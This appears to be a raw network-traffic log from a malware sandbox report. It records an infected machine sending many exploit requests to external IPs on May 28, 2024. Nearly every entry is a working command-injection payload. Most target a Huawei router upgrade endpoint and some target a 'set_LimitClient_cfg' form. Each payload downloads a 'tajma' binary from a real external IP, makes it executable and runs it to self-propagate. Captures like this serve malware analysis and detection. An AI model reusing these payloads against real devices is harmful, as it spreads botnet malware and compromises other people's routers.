                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        696192.168.2.2334262157.178.171.9437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.510751009 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        697192.168.2.2333192157.3.34.21337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.511583090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        698192.168.2.2334710197.15.67.12837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.511584044 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        699192.168.2.2357456197.208.108.18637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.511629105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        700192.168.2.234123241.224.141.25037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.512062073 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        701192.168.2.2340334157.219.89.20837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.512062073 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        702192.168.2.2350628135.182.126.21937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.290844917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        703192.168.2.233498241.191.211.21837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.290847063 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        704192.168.2.2356952197.40.181.15637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.290859938 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        705192.168.2.235440247.49.164.228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.291057110 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        706192.168.2.2340882183.92.109.2378080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.291088104 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
